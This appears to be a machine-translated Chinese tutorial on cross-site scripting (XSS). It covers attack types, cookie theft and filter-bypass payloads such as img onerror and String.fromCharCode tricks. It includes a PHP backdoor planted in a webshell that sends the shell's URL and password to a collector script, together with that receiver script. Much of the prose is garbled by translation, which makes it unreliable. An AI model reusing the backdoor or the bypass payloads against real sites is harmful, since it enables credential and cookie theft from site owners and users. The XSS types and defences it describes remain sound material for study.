table of Contents
Vulnerabilities defensive principles and
XSS also known as CSS (CrossSiteScript), because (css) with the same name as Cascading Style Sheets, so called Xss, Chinese called cross-site scripting attacks.
xss attack, mainly by attackers "html injection" tampered with the page, insert malicious script, so that when users browse the Web, controlling one way to attack the user's browser.
harm
Cookie may steal user
Hanging horse (puddle attack)
In the frequently visited website users use the site's vulnerability exploit code implanted, the visitor terminal will be implanted malicious programs or steal information directly
Worms (requires a combination of CSRF)
Limitations of keyloggers
defense
- HTML special character entities transcoding. The best filtration is a type of the entity plus HTML transcoder in the output when the second call and to prevent script injection.
- Label event properties blacklist. Special characters easily bypassed, so have tagged event was a blacklist or whitelist, where the recommended way to use whitelisting rules for implementing the direct use regular expressions to match, if the matter is not matched to the white list, it you can direct interception, rather than filtering is empty.
XSS principle analysis: output problems caused js code is identified execution
Vulnerability produce: output problem
And returns the result 1, if the injection script code
This is a simple reflection type xss
XSS technology classification
Cross-site reflective (non-persistent)
Through the server, and database did not intersect
Cross-site storage type (persistent)
Is written directly to the database, remain persistent through the server
DOM XSS
She says this is reflective XSS effect, but this XSS entirely in the client, the server does not go through, and js spliced directly to the page output
Cookie theft
Using the principle of :
By inserting a memory-type XSS script in the comments area, will be loaded each time the user visits a malicious script review, resulting in a local cookie is sent to the attacker platform
After getting webshell, modify the page after a successful login, insert xss get cookie script code
XSS platform
// 页面底植入xss代码
<script src=""></script> // xss平台中的脚本Based WebShell box Xss attack
The acquired information is sent to the penetration site by implanting Xss code website background
help.php (back door)
<?php
// 正常的大马程序
// 植入Xss
$url=$_SERVER['HTTP_HOST'].$_SERVER['PHP_SELF']; // 百度查找相应的代码
// 输出获取到的大马路径和密码,发送到自己的渗透网站中,url值可以相应修改为xss跨站获取cookie的代码
echo "<script src=http://127.0.0.1/Webshell/index.php?u=$url&p=$password></script>"
?>index.php (receive information came)
<?php
$url=$_GET['u'];
$pass=$_GET['p'];
// 可以修改为写入数据库操作
$file=fopen('webshell.html','a+');
fwrite($file,$url);
fwrite($file,"<br>");
fwrite($file,$pass);
fwrite($file,"<br>");
fclose($file);
?>Analog :
It is assumed that a hacker A Malaysian uploaded, the message will Malaysian implanted with B hacker back door code is sent to the hacker WebShell boxes B
Hackers B receives information box
This is the box WebShell invasion
If you change the code to get xss cookie can obtain permission to
XSS filter and bypass the protection related analysis (refer links)
https://www.freebuf.com/articles/web/153055.html
https://www.secpulse.com/archives/57411.html
Protection:
- Keyword filter
- Special symbols filters
- String length of the filter
- Escape coding protection
Bypass:
Change Case
Use white space
- %00
Hex coding
- Other tag call
- < img src="javascript:alert(1);">
<img src=/ onerror="alert(1)"></img>Use image tag, can not find the picture, an error code execution
Js own function
String.fromCharCode(88,83,83)ACSII conversion code into characterBypass alert (1) was filtered
Eval function execution, which need to convert the encoding format
The alert convert Unicode encoding
Real knowledge
By closing tag
First closing invalid
Try a layer of reclosable
You can pop
Bypassing the case
Write double bypass
In other labels injection
Add locator
#
